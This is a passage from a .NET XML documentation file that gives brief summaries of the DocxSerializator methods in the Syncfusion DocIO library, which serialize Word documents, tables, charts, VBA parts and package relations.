            Serialize Word document XML app.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.Serialize(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Saves the word document in the stream
            </summary>
            <param name="stream">Stream to save the document</param>
            <param name="document">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddPartContainerToArchive(Syncfusion.DocIO.DLS.PartContainer)">
            <summary>
            Add Part Container to Archive
            </summary>
            <param name="partContainer">The partContainer</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddPartContainerXMLPartContainersToArchive(System.String,System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.PartContainer})">
            <summary>
            Add Part Container from XMLPartContainers to Archive
            </summary>
            <param name="itemName">The item name</param>
            <param name="xmlPartContainers">Xml part containers</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFontTable(System.String@)">
            <summary>
            Serialize the Font table
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetFontSignature(System.Byte[])">
            <summary>
            Get the font signature
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocument">
            <summary>
            Serializes the document elements (document.xml)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeVbaProjectRelations">
            <summary>
            Serializes the vba project relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeVbaProject">
            <summary>
            Serializes the vba project.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeVbaData">
            <summary>
            Serializes the vba data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHeaderFooters">
            <summary>
            Serialize Headers and Footers
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHeaderFooter(Syncfusion.DocIO.DLS.HeaderFooterType,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Serializes the Header/Footer
            </summary>
            <param name="hfType">Type of the HeaderFooter</param>
            <param name="doc">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHeader(Syncfusion.DocIO.DLS.HeaderFooter,System.String,System.String,System.String)">
            <summary>
            Serialize the header part
            </summary>
            <param name="header">The header</param>
            <param name="id">The header relationship ID</param>
            <param name="headerFooterPath">The header path</param>
            <param name="headerFooterRelsPath">The header's relation path</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFooter(Syncfusion.DocIO.DLS.HeaderFooter,System.String,System.String,System.String)">
            <summary>
            Serailize the footer and its relations
            </summary>
            <param name="footer">The Footer</param>
            <param name="id">The Footer relationship ID</param>
            <param name="headerFooterPath">Path of the Header Footer part</param>
            <param name="headerFooterRelsPath">Path of the HeaderFooter relations</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHFRelations(System.String,System.String)">
            <summary>
            Serializes the HeaderFooter relations
            </summary>
            <param name="hfId">The headerfooter id.</param>
            <param name="headerFooterRelsPath">Path of the HeaderFooter relations</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHFCommonRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Serializes the Header/Footer common relations.
            </summary>
            <param name="stream">Stream to write the relations.</param>
            <param name="xmlItemsRels">The XML items relations.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.HasSinglePageField(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Checks whether the TextBodyItem (paragraph) contains only a page field 
            </summary>
            <param name="item">The TextBodyItem</param>
            <returns>return true, if the textBodyItem has a single page field.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddChartsToZip(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Adds the charts to zip.
            </summary>
            <param name="package">The package.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddControlsToZip(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Adds the controls to zip.
            </summary>
            <param name="package">The package.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddToZip(Syncfusion.DocIO.DLS.Package,System.String)">
            <summary>
            Adds the part container to zip.
            </summary>
            <param name="package">The package.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRelItems(Syncfusion.DocIO.DLS.Package,Syncfusion.DocIO.DLS.PartContainer)">
            <summary>
            Serialize the related for part container items.
            </summary>
            <param name="package">The package.</param>
            <param name="chartCont">The chart container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddPartsToZip(Syncfusion.DocIO.DLS.Package,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Adds the parts to zip.
            </summary>
            <param name="package">The package.</param>
            <param name="relations">The relations.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ParseRelations(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Parses the relations.
            </summary>
            <param name="relReader">The rel reader.</param>
            <param name="relations">The relations collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddXmlItemsToZip(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Adds the xml items to zip.
            </summary>
            <param name="package">The package.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddContainerToZip(Syncfusion.DocIO.DLS.PartContainer,System.String)">
            <summary>
            Adds the container to zip.
            </summary>
            <param name="cont">The cont.</param>
            <param name="dataPath">The data path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteRel(System.String)">
            <summary>
            
            </summary>
            <param name="relPath"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEndnoteRelations">
            <summary>
            Serializes the Endnote relations
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootnoteRelations">
            <summary>
            Serializes the Footnote relations
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCommentRelations">
            <summary>
            Serializes the Comment relations
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocumentRelations">
            <summary>
            Serializes the document relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeNumberingsRelation">
            <summary>
            Serializes the numbering relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAltChunkRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Serializes the Alternate chunk relations
            </summary>
            <param name="stream">The memory stream</param>
            <param name="altChunkCollection">Collection of alternate chunk relation</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHyperlinkRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Serializes the Hyperlink relations
            </summary>
            <param name="stream">The memory stream</param>
            <param name="hyperlinkCollection">Collection of Hyperlink relation</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeImagesRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.ImageRecord})">
            <summary>
            Serializes the image relations
            </summary>
            <param name="stream">The memory stream</param>
            <param name="imageCollection">Collection of images and its relationship id</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHeaderFooterRelations(System.IO.MemoryStream)">
            <summary>
            Serializes the HeaderFooters relations to the document relations stream
            </summary>
            <param name="docRelStream">Document relation stream (Word/.rels/document.xml.rels)</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHFRelation(Syncfusion.DocIO.DLS.HeaderFooterType,System.IO.MemoryStream)">
            <summary>
            Serializes the headers footers relations.
            </summary>
            <param name="hfType">Type of the HeaderFooter.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeIncludePictureUrlRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Serializes the IncludePicture field relations
            </summary>
            <param name="stream">The memory Stream</param>
            <param name="InclPicFieldUrl">Collection of URL that represents the picture mapped through the IncludePicture Field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerilaizeXmlItemsRelations(System.IO.MemoryStream,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Serializes the XML Item relations
            </summary>
            <param name="stream"></param>
            <param name="xmlItemsRels"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddOLEToZip(System.Collections.Generic.Dictionary{System.String,System.IO.Stream})">
            <summary>
            Adds the OleObject (*.Bin) into the package
            </summary>
            <param name="OleContainers">Collection of OLE Containers</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddOLEToZip(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Adds the OLE objects to zip.
            </summary>
            <param name="package">The package.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBackground(Syncfusion.DocIO.DLS.Background)">
            <summary>
            Serialize the document background
            </summary>
            <param name="background">The document background</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradient(Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Serialize the background gradient
            </summary>
            <param name="gradient">The backgroundGradient</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientShadings(Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Serialize the gradient shadings
            </summary>
            <param name="gradient">The background gradients</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientColor(Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Serialize the gradient color
            </summary>
            <param name="gradient">The background gradient</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateImages(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Ensure the presence of metafiles and image presence in the document
            </summary>
            <param name="pic"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocumentBody">
            <summary>
            Serializes the document body
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Serializes the Section.
            </summary>
            <param name="section">The WSection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBodyItems(Syncfusion.DocIO.DLS.BodyItemCollection,System.Boolean)">
            <summary>
            Serializes the bodyItems
            </summary>
            <param name="bodyItemCollection">Collection of Body items</param>
            <param name="isLastSection">True, if the body items present in the last section of the document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBodyItem(Syncfusion.DocIO.DLS.TextBodyItem,System.Boolean)">
            <summary>
            Serialize the TextBody item
            </summary>
            <param name="item">The textBody item (paragraph or table)</param>
            <param name="isLastSection">True, if the body items present in the last section of the document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTContentInline(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Serialize SDT content inline
            </summary>
            <param name="body"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateAlternateChunkRelation(Syncfusion.DocIO.DLS.Entity,Syncfusion.DocIO.DLS.AlternateChunk)">
            <summary>
            Update the Alternate chunk relation for Comment/HeaderFooter/EndNote/FootNode/Document
            </summary>
            <param name="entity"></param>
            <param name="altChunk"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAlternateChunk(Syncfusion.DocIO.DLS.AlternateChunk)">
            <summary>
            Seralize Alternate content
            </summary>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStructureDocumentTagBlock(Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Seralize structure document tag block
            </summary>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTProperties(Syncfusion.DocIO.DLS.SDTProperties)">
            <summary>
            Serialize structure document tag properties
            </summary>
            <param name="properties"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDocPartItem(Syncfusion.DocIO.DLS.DocPartItem)">
            <summary>
            Serialize Doc Part obj and Doc part list Child elements
            </summary>
            <param name="docPartItem"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTDataBinding(Syncfusion.DocIO.DLS.SDTDataBinding)">
            <summary>
            Serialize SDT data binding
            </summary>
            <param name="dataBinding"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTLockSetting(Syncfusion.DocIO.DLS.LockSettings)">
            <summary>
            Serialize SDT lock settings
            </summary>
            <param name="lockSetting"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTType(Syncfusion.DocIO.DLS.SDTProperties)">
            <summary>
            Serialize SDT type
            </summary>
            <param name="type"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTCheckBox(Syncfusion.DocIO.DLS.SDTCheckBox)">
            <summary>
            Serialize SDT Check box
            </summary>
            <param name="sdtCheckBox">check box</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTDropDownList(Syncfusion.DocIO.DLS.SDTDropDownList)">
            <summary>
            Serialize SDTDropDownList
            </summary>
            <param name="comboBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTComboBox(Syncfusion.DocIO.DLS.SDTComboBox)">
            <summary>
            Serialize SDTComboBox
            </summary>
            <param name="comboBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTDate(Syncfusion.DocIO.DLS.SDTDate)">
            <summary>
            Serialize SDT date
            </summary>
            <param name="date"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetCalenderType(Syncfusion.DocIO.DLS.CalendarType)">
            <summary>
            Get Calender type
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSDTContent(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Serialize SDT content
            </summary>
            <param name="body"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serialize the table
            </summary>
            <param name="table">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableRows(Syncfusion.DocIO.DLS.WRowCollection)">
            <summary>
            Serialize the table rows
            </summary>
            <param name="rows">The table row collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRow(Syncfusion.DocIO.DLS.WTableRow,System.Boolean,System.Boolean)">
            <summary>
            Serialize the table row
            </summary>
            <param name="row">The table row</param>
            <param name="isIns"></param>
            <param name="isDel"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCells(Syncfusion.DocIO.DLS.WCellCollection)">
            <summary>
            serialize the table cells
            </summary>
            <param name="cells">The table cell collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Serialize the table cell
            </summary>
            <param name="cell">The table cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.MergeCharProps(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Merge the characterFormats
            </summary>
            <param name="ParaBreakCharFormat">The paragraph's break character format</param>
            <param name="cellCharacterFormat">The cell character format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellFormat(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Serialize the cell formatting
            </summary>
            <param name="cellFormat">The cell format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellVerticalAlign(Syncfusion.DocIO.DLS.VerticalAlignment)">
            <summary>
            Serialize the cell vertical alignment
            </summary>
            <param name="alignment"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableCellDirection(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Serialize the table cell direction
            </summary>
            <param name="cellFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellShading(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.RowFormat,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the cell shading
            </summary>
            <param name="cell">The table cell</param>
            <param name="tf">The parent table format</param>
            <param name="rf">The parent row format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellMerge(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Serialize cell merge
            </summary>
            <param name="cellFormat">The cell format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGridSpan(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Serialize the grid span element of cell.
            </summary>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellWidth(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Serialize the cell width
            </summary>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRowFormat(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Serialize the row format
            </summary>
            <param name="row">The table row</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCnfStyleElement(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Serialize the conditional formatting style element for table row
            </summary>
            <param name="row">The row</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCnfStyleElement(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Serialize the conditional formatting style element for table cell
            </summary>
            <param name="cell">The cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCnfStyleElement(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Serialize the conditional formatting style element for paragraph in table
            </summary>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsParagraphHasCnfStyle(Syncfusion.DocIO.DLS.IStyle,System.Int32,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Checks whether the paragraph has cnf style or not.
            </summary>
            <param name="style">style</param>
            <param name="rowIndex">row Index</param>
            <param name="table">table</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableFormat(Syncfusion.DocIO.DLS.RowFormat,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serialize the row formattings.
            Table parameter is passed for serializing table format and null for serializing row format.
            </summary>
            <param name="format">the row format</param>
            <param name="table">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableTitle(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serializes the table title. 
            Word 2010 specific property.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableDescription(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serializes the table description. 
            Word 2010 specific property.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTblTrackChanges(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table track changes
            </summary>
            <param name="format">The table format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableCellMargin(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table cell margins (paddings)
            </summary>
            <param name="format">The row formattings</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePaddings(Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Serialize the paddings
            </summary>
            <param name="paddings"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTblLayout(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table layout element
            </summary>
            <param name="format">The row format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableShading(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table shading
            </summary>
            <param name="format">The row format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableBorders(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table borders
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsNoneBorder(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            To ensure none border
            </summary>
            <param name="borders"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableIndentation(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table indentation.
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCellSpacing(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the cell spacing.
            </summary>
            <param name="format">The row format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableWidth(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serialize the table width
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableAlignment(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table alignment
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTablePositioning(Syncfusion.DocIO.DLS.RowFormat.TablePositioning)">
            <summary>
            Serialize the table absolute positioning formattings.
            </summary>
            <param name="positioning"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableHorizPosition(Syncfusion.DocIO.HorizontalPosition)">
            <summary>
            Serialize the table's horizontal positionings.
            </summary>
            <param name="position"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableVertPosition(Syncfusion.DocIO.VerticalPosition)">
            <summary>
            Serialize the table's vertical position.
            </summary>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableVertRelation(Syncfusion.DocIO.VerticalRelation)">
            <summary>
            Serialize the table's vertical relation.
            </summary>
            <param name="relation">The relation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableHorizRelation(Syncfusion.DocIO.HorizontalRelation)">
            <summary>
            Serialize the table's horizontal relation.
            </summary>
            <param name="relation">The relation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableStlye(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Serialize the table style element
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetStyleNameId(System.String)">
            <summary>
            Gets style name Id.
            </summary>
            <param name="styleName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableLook(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serialize the table look element
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTableGrid(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Serialize the table grid
            </summary>
            <param name="table">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGridColumns(System.Collections.Generic.List{System.Single})">
            <summary>
            Serialize the table grid columns.
            </summary>
            <param name="grid">The grid values.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGridColumn(System.Single)">
            <summary>
            Serialize grid column.
            </summary>
            <param name="colWidth">The column width</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Boolean)">
            <summary>
            Serialize the paragraph
            </summary>
            <param name="paragraph">The paragraph</param>
            <param name="isLastSection"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.EnsureWatermark(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Serialize watermark if paragraph is the first item of Header document
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphItems(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Serialize the paragraph items
            </summary>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeParagraphItem(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Serialize the paragraph item
            </summary>
            <param name="item">The paragraph item</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChart(Syncfusion.DocIO.DLS.WChart)">
            <summary>
            Serialize chart
            </summary>
            <param name="chart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChartGraphicData(Syncfusion.DocIO.DLS.WChart)">
            <summary>
            Serialize chart graphic data
            </summary>
            <param name="chart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChartRelation(System.IO.MemoryStream)">
            <summary>
            Serialize chart relations into document relations
            </summary>
            <param name="docRelStream">Document relation stream (Word/.rels/document.xml.rels)</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChartElements(Syncfusion.DocIO.DLS.WChart,System.String)">
            <summary>
            Serialize Chart elements
            </summary>
            <param name="chart"></param>
            <param name="id"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.NextChartElementsRelationId">
            <summary>
            Get Next Chart elements relation Id
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeChartElementRelations(System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry},System.String)">
            <summary>
            Serialize relations of chart
            </summary>
            <param name="relationId"></param>
            <param name="relation"></param>
            <param name="OccurrenceOfChart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWorksheet(System.Xml.XmlWriter,Syncfusion.DocIO.DLS.WChart,System.IO.Stream,System.Collections.Generic.Dictionary{System.Int32,System.Int32})">
            <summary>
            Serialize chart worrksheet
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDimensions(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl)">
            <summary>
            Serialize dimensions of chart worksheet
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSheetData(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl,System.String)">
            <summary>
            Serialize Worksheet data
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
            <param name="cellTag"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeRow(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl,System.String,System.Int32)">
            <summary>
            Serialize worksheet row
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
            <param name="cellTag"></param>
            <param name="row"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCells(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl,System.String,System.Int32)">
            <summary>
            Serialize worksheet cells
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
            <param name="cellTag"></param>
            <param name="row"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCell(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl,System.String,System.Int32,System.Int32)">
            <summary>
            Serialize worksheet cell
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
            <param name="cellTag"></param>
            <param name="row"></param>
            <param name="column"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSST(System.Xml.XmlWriter,Syncfusion.OfficeChart.Implementation.WorksheetImpl)">
            <summary>
            Serialize worksheet shared settings
            </summary>
            <param name="writer"></param>
            <param name="sheet"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetEmuFromPoint(System.Decimal)">
            <summary>
            Gets the emu from point.
            </summary>
            <param name="pointValue">The point value.</param>
            <returns></returns>
        </member>
